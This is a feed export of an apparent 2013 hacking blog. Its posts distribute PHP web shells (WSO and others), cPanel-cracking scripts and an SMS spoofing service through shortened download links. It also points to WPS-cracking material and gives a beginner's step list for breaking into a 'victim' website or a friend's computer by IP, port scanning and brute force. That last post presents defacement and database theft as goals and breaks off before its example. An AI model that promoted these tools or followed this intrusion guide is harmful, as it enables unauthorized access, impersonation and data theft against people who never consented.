tag:blogger.com,1999:blog-57274312906300092002024-03-24T00:10:23.606-07:00Kali LinuxLukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.comBlogger28125tag:blogger.com,1999:blog-5727431290630009200.post-10665430688203757812013-06-20T13:50:00.003-07:002013-06-20T13:50:54.977-07:00Best Collection Of Shells<div style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; padding: 0px; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px; text-align: left;">
<span style="background-color: white;">c0derz shell</span></div>
</div>
<div style="text-align: left;">
<span style="background-color: white;">confkiller</span></div>
</div>
<div style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px;">
<span style="background-color: white;">database<br />dhanush shell<br />domains<br />lol<br />private<br />Safe_Mode<br />shell2<br />SimShell 1.0<br />Symlink_sa 3.0<br />WSO</span></div>
<div style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm2tY6CA5UjxDrOZG4xS5hJ3Y2rKAXIKROx7FCwqlC47fGcirHJe98aHlPqmMf_YhhM9Dc8VURXCUNyzo__Sln5snPJBxkBL2WXeBfF1K87aWpULSU5rpuOXFLSqh9Y5HDoPFZPXH7-70/s1600/c0derz.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhm2tY6CA5UjxDrOZG4xS5hJ3Y2rKAXIKROx7FCwqlC47fGcirHJe98aHlPqmMf_YhhM9Dc8VURXCUNyzo__Sln5snPJBxkBL2WXeBfF1K87aWpULSU5rpuOXFLSqh9Y5HDoPFZPXH7-70/s640/c0derz.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<span style="background-color: white;"><br style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" /></span>
<br />
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWogR6UX8-W8_n7bwN-JQce3LQNK0Z6szOZuI97doW7JN7UqoZXUcKkDk83ahYhcAeHgHUGkm9ypfuJ8iwmVcth0QbgO8wZilto3aqofD2YhxPw5LZsODX3taN0NM0JCl9OrLhHE438sg/s1600/database.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWogR6UX8-W8_n7bwN-JQce3LQNK0Z6szOZuI97doW7JN7UqoZXUcKkDk83ahYhcAeHgHUGkm9ypfuJ8iwmVcth0QbgO8wZilto3aqofD2YhxPw5LZsODX3taN0NM0JCl9OrLhHE438sg/s640/database.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<div style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5OSkvGJG9UEhked6jY7CJ56Yw1FhefFufQeQWWzXZl84H7LINdzQC6xWKb8s4ba4jH7nR9bKtO5VCpJF2MrdDG_YC99UMKg06a5J3h7xeG6OSWXzhtBwJuHll8wmjNSTy5Fq3RGLkRh0/s1600/dhanush+shell.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="251" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj5OSkvGJG9UEhked6jY7CJ56Yw1FhefFufQeQWWzXZl84H7LINdzQC6xWKb8s4ba4jH7nR9bKtO5VCpJF2MrdDG_YC99UMKg06a5J3h7xeG6OSWXzhtBwJuHll8wmjNSTy5Fq3RGLkRh0/s640/dhanush+shell.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<span style="background-color: white;"><br style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" /></span>
<br />
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_ActG1oua-F-qCQ_r8xpCb2FROjYKNt1rIsVkLPcJAOoP6Z1d3SUV3v-swvoezLWtskbAVoZnDPr6xKCp7PPMWfIxMnwXGuy8-PYWPPhjUACi_LH2N7ALCBz_iJe7MKCDWfVMsXn-v1U/s1600/lol.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="256" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi_ActG1oua-F-qCQ_r8xpCb2FROjYKNt1rIsVkLPcJAOoP6Z1d3SUV3v-swvoezLWtskbAVoZnDPr6xKCp7PPMWfIxMnwXGuy8-PYWPPhjUACi_LH2N7ALCBz_iJe7MKCDWfVMsXn-v1U/s640/lol.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<div style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJsdiIaeMKqzV7vj1nfqLz60BlDWvY3WnNuu0S9SSpYArIHJa6CqWIHN4u8TJ-EcOBcgf0izAnxlDR6oS78PQDWzuSpLGmkRCYvwL9_CbMfSMuHm0ckwMa3DmopWP6WnU-anCjpACCubc/s1600/confikiller.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="234" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiJsdiIaeMKqzV7vj1nfqLz60BlDWvY3WnNuu0S9SSpYArIHJa6CqWIHN4u8TJ-EcOBcgf0izAnxlDR6oS78PQDWzuSpLGmkRCYvwL9_CbMfSMuHm0ckwMa3DmopWP6WnU-anCjpACCubc/s640/confikiller.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc6JS7ynssLlDzvXtD0kOvwcPCjPrdFn-0SfiN31xTQPkOjaIrV8tGTpFofmcgwiDm9YST7YYtEVZz5MEIOAatS-QizhlYzfvydBB6lZXe-hX3uuhDDpeaBrS6Dwlg_ZLJLPAjtYOLn4U/s1600/WSO.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgc6JS7ynssLlDzvXtD0kOvwcPCjPrdFn-0SfiN31xTQPkOjaIrV8tGTpFofmcgwiDm9YST7YYtEVZz5MEIOAatS-QizhlYzfvydBB6lZXe-hX3uuhDDpeaBrS6Dwlg_ZLJLPAjtYOLn4U/s640/WSO.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<div style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic-K70Xy_9-l9cR2G6FFGe-XE_0eEYs6GzvwdjsoVmf0WC09z-LCw67fBN1dCmhh8mpp0CD0YiMF8KJMiWu_B3EDRDOhbfy9qko-qJ0dHBfensMnY4jlg4BElGiWeDoRHLiQd5mqKQTa8/s1600/symlink_sa.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEic-K70Xy_9-l9cR2G6FFGe-XE_0eEYs6GzvwdjsoVmf0WC09z-LCw67fBN1dCmhh8mpp0CD0YiMF8KJMiWu_B3EDRDOhbfy9qko-qJ0dHBfensMnY4jlg4BElGiWeDoRHLiQd5mqKQTa8/s640/symlink_sa.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<span style="background-color: white;"><span style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;"> </span><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6zAJFtVbUjEjCSgyzzK8Yk57R-5cgZiGChz1VBBRus48wmXtg21Jp_F_AcTKqXM98BuSSX0hEvXaF9q4t_ffFejFn5qGb7ElDCOnS26_R-a4CgRXA_o7tEouPsCW7XtFPGcO6xJ2xNVU/s1600/simshell.png" imageanchor="1" style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin-left: 1em; margin-right: 1em; text-align: center; text-decoration: none;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6zAJFtVbUjEjCSgyzzK8Yk57R-5cgZiGChz1VBBRus48wmXtg21Jp_F_AcTKqXM98BuSSX0hEvXaF9q4t_ffFejFn5qGb7ElDCOnS26_R-a4CgRXA_o7tEouPsCW7XtFPGcO6xJ2xNVU/s640/simshell.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></span><br />
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcLBSO4C87Bmwkd4y1pYHEQC0vGxroiP8tBXQPvtImqehMmnbO4OHSdD15zQXG8AVtCF9MUx9FmrzsB_gdF2H4dDHiyeAmj1MxNtxWLoMvZRPnb729zIlH0sfyXY0SzG4DZ0zBHYp37yw/s1600/private.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcLBSO4C87Bmwkd4y1pYHEQC0vGxroiP8tBXQPvtImqehMmnbO4OHSdD15zQXG8AVtCF9MUx9FmrzsB_gdF2H4dDHiyeAmj1MxNtxWLoMvZRPnb729zIlH0sfyXY0SzG4DZ0zBHYp37yw/s640/private.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiizYImRbio8SfWQaRu18niFEGnqUfHpjWQ_5TgMJX-haQq4Uh9Vqqeirc1V-iruPlbQHmd00QR9nJxBWKJHz4Pv-fzcLNqbsbCMe7kvULZkrhyphenhyphenNKhOg7CxvrK6llY0L75ptP2NRaWrMlc/s1600/Safe_mode.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiizYImRbio8SfWQaRu18niFEGnqUfHpjWQ_5TgMJX-haQq4Uh9Vqqeirc1V-iruPlbQHmd00QR9nJxBWKJHz4Pv-fzcLNqbsbCMe7kvULZkrhyphenhyphenNKhOg7CxvrK6llY0L75ptP2NRaWrMlc/s640/Safe_mode.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<span style="background-color: white;"><br /></span></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<span style="background-color: white; color: black; margin-left: 1em; margin-right: 1em; text-decoration: none;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZAer0L7Gp-8F_GdtMhk0-f6O-lcpfObYK6YRaVylNSOUoRbcASdSXkbZOcOxupkFPnhYqb60PhsN1i_dET3BsRzGs4wU8vcW2Uc85-H9TipEWTzqjb5veQW6sCGORTUJXCvCR5UQT7d4/s1600/shell2.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjZAer0L7Gp-8F_GdtMhk0-f6O-lcpfObYK6YRaVylNSOUoRbcASdSXkbZOcOxupkFPnhYqb60PhsN1i_dET3BsRzGs4wU8vcW2Uc85-H9TipEWTzqjb5veQW6sCGORTUJXCvCR5UQT7d4/s640/shell2.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></a></span></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<a href="http://adf.ly/QqO3A" target="_blank">DOWNLOAD</a></div>
<div style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
</div>
<br />Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com11tag:blogger.com,1999:blog-5727431290630009200.post-37851492485643468072013-06-19T15:42:00.001-07:002013-06-19T15:46:08.006-07:00How to crack cpanel 2013<br />
<iframe width="480" height="360" src="http://www.youtube.com/embed/KtVWePMzE9A" frameborder="0" allowfullscreen></iframe>
<br />
<br />
Download:<br />
<br />
bt.py : <a href="http://adf.ly/QnJ0z">http://adf.ly/QnJ0z</a><br />
bt.php : <a href="http://adf.ly/QnJ8M">http://adf.ly/QnJ8M</a>Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com9tag:blogger.com,1999:blog-5727431290630009200.post-47909758238757121432013-06-19T07:14:00.001-07:002013-06-19T07:14:11.851-07:00Hacking web server in armitage<iframe width="480" height="360" src="http://www.youtube.com/embed/3UxyrndLHMw" frameborder="0" allowfullscreen></iframe>Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com1tag:blogger.com,1999:blog-5727431290630009200.post-49314566212619356682013-06-19T07:10:00.003-07:002013-06-19T07:10:50.905-07:00PhpMyAdmin version 3.5.7 vulnerable to Cross Site Scripting<br />
<div class="post-body entry-content" id="post-body-7280943132535097696" itemprop="articleBody" style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin: 0px; padding: 0px; text-align: center;">
<div dir="ltr" style="margin: 0px; padding: 0px; text-align: left;" trbidi="on">
<div class="separator" style="clear: both; margin: 0px; padding: 0px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGp2i4p7bwe6IKgTBENoDb4NEuOtRLpbem4WjmKqZBeiepCWri-dcCiiqxLGPJ7s4ltCCPCViHKFQGOXt2X7ClC8a2gQBf0NFIQ3YxhRPG7YFNqVktFnKpihA4E6lrxCFVDdFSiy-g-4/s1600/15255_660613267285883_2004469110_n.png" imageanchor="1" style="background-color: white; margin-left: 1em; margin-right: 1em; text-decoration: none;"><span style="color: black;"><img border="0" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEGp2i4p7bwe6IKgTBENoDb4NEuOtRLpbem4WjmKqZBeiepCWri-dcCiiqxLGPJ7s4ltCCPCViHKFQGOXt2X7ClC8a2gQBf0NFIQ3YxhRPG7YFNqVktFnKpihA4E6lrxCFVDdFSiy-g-4/s640/15255_660613267285883_2004469110_n.png" style="border: 0px; margin: 0px; padding: 0px;" width="640" /></span></a></div>
<div style="margin: 0px; padding: 0px;">
<span style="background-color: white;">phpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the World Wide Web. phpMyAdmin supports a wide range of operations with MySQL. phpMyAdmin 3.5.0 to 3.5.7 versions are vulnerable to Reflected XSS in "tbl_gis_visualization.php", as mentioned in <a href="http://www.waraxe.us/advisory-102.html" style="text-decoration: none;">advisory</a>. The reason for XSS is stated as insufficient sanitization of html output. Parameters vulnerable are "visualizationSettings[width]" and "visualizationSettings[height]" on "tbl_gis_visualization.php" .But there should be a valid session and valid database name for exploiting the vulnerability. Publically available exploitation details make javascript alert box to pop up, confirming the existence of Reflected XSS. The new updated version 3.5.8 is available on official website.</span></div>
</div>
</div>
<br />Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com3tag:blogger.com,1999:blog-5727431290630009200.post-66662115854198307422013-06-18T17:23:00.001-07:002013-06-18T17:36:01.864-07:00New sms spoofer across 100 countries<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKBol3eNnxvWaACWDb634ZzvFvSqetmlalSec1Rl-TGm7tD_XV_flHQvUq1FeHI0FvwxAkrCGNUx3g8RJlHgrYUeMqDKI4Iovp4o-0GG0_bQdZIEYklFLfmYp7pCBT93mczR_hsOGGhaE/s1600/09vzsbemp1_spoofing_529396e.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKBol3eNnxvWaACWDb634ZzvFvSqetmlalSec1Rl-TGm7tD_XV_flHQvUq1FeHI0FvwxAkrCGNUx3g8RJlHgrYUeMqDKI4Iovp4o-0GG0_bQdZIEYklFLfmYp7pCBT93mczR_hsOGGhaE/s320/09vzsbemp1_spoofing_529396e.jpg" width="235" /></a></div>
<b style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;">SMS spoofing</b><span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;"> is a relatively new technology which uses the </span>short message service<span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;"> (SMS), available on most </span><a href="http://en.wikipedia.org/wiki/Mobile_phone" style="background-color: white; background-image: none; color: #0b0080; font-family: sans-serif; font-size: 13px; line-height: 19.1875px; text-decoration: none;" title="Mobile phone">mobile phones</a><span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;"> and </span>personal digital assistants<span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;">, to set who the message appears to come from by replacing the originating mobile number (Sender ID) with alphanumeric text. Spoofing has both legitimate uses (setting the company name from which the message is being sent, setting your own mobile number, or a product name) and illegitimate uses (such as impersonating another person, company, product).</span><br />
<span style="background-color: white; font-family: sans-serif; font-size: 13px; line-height: 19.1875px;"><br /></span>
<span style="background-color: white; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: xx-small; line-height: 18px;">Simply visit and register </span><a href="http://adf.ly/QkAfd" target="_blank">here</a><span style="background-color: white; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: xx-small; line-height: 18px;">! Then start sending sms to any one with any number.</span><br />
<span style="background-color: white; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: xx-small; line-height: 18px;"><br /></span>
<span style="background-color: white; color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: xx-small; line-height: 18px;">Sms spoofer: </span><span style="color: #333333; font-family: Helvetica Neue Light, HelveticaNeue-Light, Helvetica Neue, Helvetica, Arial, sans-serif; font-size: xx-small;"><span style="line-height: 18px;"><a href="http://adf.ly/QkAfd">http://adf.ly/QkAfd</a></span></span>Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com4tag:blogger.com,1999:blog-5727431290630009200.post-33679880743896614672013-06-18T16:06:00.002-07:002013-06-18T16:06:26.014-07:00HOW TO CRACK WPA/WPA WITHOUT WORDLIST<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_2rjjgiEp7ZBt8dKTGTFuGWlszKky9X3gDzxY8nJWFQqIUpca3HJhoLznwYNKMxwOVI1puy7TkkBRKH9keGs_LRX-XDfc5Jgu3jubOR1RmrSGemSxMUwyvq-OAEe2tXg1roGjLwyeQAo/s1600/Screenshot+from+2013-06-04+20:48:55.png" style="background-color: #1b1b1c; clear: left; color: #87bf03; float: left; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; margin-bottom: 1em; margin-right: 1em; text-align: center; text-decoration: none;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_2rjjgiEp7ZBt8dKTGTFuGWlszKky9X3gDzxY8nJWFQqIUpca3HJhoLznwYNKMxwOVI1puy7TkkBRKH9keGs_LRX-XDfc5Jgu3jubOR1RmrSGemSxMUwyvq-OAEe2tXg1roGjLwyeQAo/s320/Screenshot+from+2013-06-04+20:48:55.png" style="border: 0px; margin: 0px; padding: 0px;" width="320" /></a><br style="background-color: #1b1b1c; color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" /><span style="background-color: white;"><span style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;">Reaver implements a brute force attack against Wifi Protected Setup (WPS) registrar PINs in order to recover WPA/WPA2 passphrases, as described in </span><a href="http://adf.ly/Q210f" style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center; text-decoration: none;">http://adf.ly/Q210f</a><br style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px; text-align: center;" /></span><br />
<div style="margin: 0px; padding: 0px; text-align: center;">
<span style="background-color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: 16px;">Reaver has been designed to be a robust and practical attack against WPS, and has been tested against a wide variety of access points and WPS implementations.<br /></span><div style="margin: 0px; padding: 0px;">
<span style="background-color: white;"><span style="font-family: verdana, helvetica, tahoma, arial, sans-serif;">On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 4-10 hours, depending on the AP. In practice, it will generally take half this time to guess the correct WPS pin and recover the passphrase</span><br /><br /><span style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: medium;">VIDEO TUTORIAL: </span><span style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: medium;"><a href="http://adf.ly/Qjzm2">http://adf.ly/Qjzm2</a></span><br /><span style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: medium;"><br /></span></span><div style="margin: 0px; padding: 0px;">
<span style="background-color: white; font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: medium;">TEXT TUTORIAL: </span><span style="font-family: verdana, helvetica, tahoma, arial, sans-serif; font-size: medium;"><a href="http://adf.ly/Qk0N8">http://adf.ly/Qk0N8</a></span></div>
</div>
</div>
<br />Lukahttp://www.blogger.com/profile/12845576990602536643noreply@blogger.com23tag:blogger.com,1999:blog-5727431290630009200.post-72582261924424519272013-06-18T11:56:00.000-07:002013-06-18T11:56:28.043-07:00Hack remote computer via ip and open port<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRBoJqjP9nWt8SnUq8tba2XjXIWWfdlKqAuNd_bFeUewieLc2GCIeUn64yO8kYc1JEgE4O_Law6jqjpFGEEdNDM0glG3hoWPjc_rzvh5I_19Qw7KA05GMu0BUetQV6OaXfjx5w0U_TYw0/s1600/Findsomeonesip-address.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="292" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRBoJqjP9nWt8SnUq8tba2XjXIWWfdlKqAuNd_bFeUewieLc2GCIeUn64yO8kYc1JEgE4O_Law6jqjpFGEEdNDM0glG3hoWPjc_rzvh5I_19Qw7KA05GMu0BUetQV6OaXfjx5w0U_TYw0/s400/Findsomeonesip-address.jpg" width="400" /></a></div>
<div style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-bottom: 10px; padding: 0px; text-align: justify; vertical-align: baseline;">
Literally, hacking is accessing something or somebody in internet without their permission or interest. While, speaking in summary, hacking is very easy job, it is like instead of using front door, finding the hidden door of a house and hijacking the precious things. Among all the hacking, hacking via IP address is one of the most common yet powerful beginning.</div>
<div style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-bottom: 10px; padding: 0px; text-align: justify; vertical-align: baseline;">
You may want to hack the website and put your advertisement there or grab some database information In this type of hacking, you are playing with the web server’s computer instead of the administrator’s computer. Because, www.website.com is hosted in separate web server rather than personal computer.</div>
<div style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-bottom: 10px; padding: 0px; text-align: justify; vertical-align: baseline;">
Another can be accessing your friend’s computer from your home. Again this is IP based and this is possible only when your friend’s computer is online. If it is off or not connected to internet then remote IP hacking is totally impossible<a href="" name="more" style="border: 0px; color: #e1380f; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;"></a>.</div>
<div style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin-bottom: 10px; padding: 0px; text-align: justify; vertical-align: baseline;">
Well, both of the hacking has the same process. Let’s summarize what we must do.</div>
<ol style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin: 0px 1.5em 1.5em; padding: 0px; text-align: justify; vertical-align: baseline;">
<li style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Confirm the website or a computer you want to hack.</li>
<li style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Find or trace their IP address.</li>
<li style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Make sure that IP address is online</li>
<li style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Scan for open ports</li>
<li style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Check for venerable ports</li>
<li style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">access through the port</li>
<li style="border: 0px; font-family: inherit; font-style: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Brute-force username and password</li>
</ol>
<div style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
Now let me describe in brief in merely basic steps that a child can understand it.</div>
<div style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
First, getting the IP address of victim.</div>
<div style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
To get the IP address of the victim website, ping for it in command prompt.<div style="border: 0px; font-family: inherit; font-style: inherit; margin-bottom: 10px; padding: 0px; vertical-align: baseline;">
</div>
</div>
<div style="background-color: white; border: 0px; color: #474747; font-family: Arial, Verdana; font-size: 14px; line-height: 20px; margin: 0px; padding: 0px; text-align: justify; vertical-align: baseline;">
For example,</div>
